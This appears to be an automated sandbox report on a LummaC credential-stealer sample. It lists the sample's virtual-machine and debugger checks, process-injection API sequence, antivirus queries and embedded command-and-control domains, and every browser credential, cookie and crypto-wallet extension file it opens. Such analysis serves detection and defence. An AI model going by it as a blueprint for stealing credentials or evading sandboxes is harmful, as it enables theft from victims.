Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Memory allocated: 1570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\random.exe TID: 7060

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.1796969468.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Code function: 3_2_00442080 LdrInitializeThunk,

3_2_00442080

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_03087F19 mov edi, dword ptr fs:[00000030h]		0_2_03087F19
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_03088096 mov edi, dword ptr fs:[00000030h]		0_2_03088096

Source: C:\Users\user\Desktop\random.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_03087F19 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_03087F19

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\random.exe

Memory written: C:\Users\user\Desktop\random.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pancakedipyps.click

Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\Users\user\Desktop\random.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: random.exe, 00000003.00000002.1797182496.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: random.exe, 00000003.00000002.1796969468.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: random.exe, 00000003.00000002.1796969468.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: random.exe, 00000003.00000002.1796969468.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
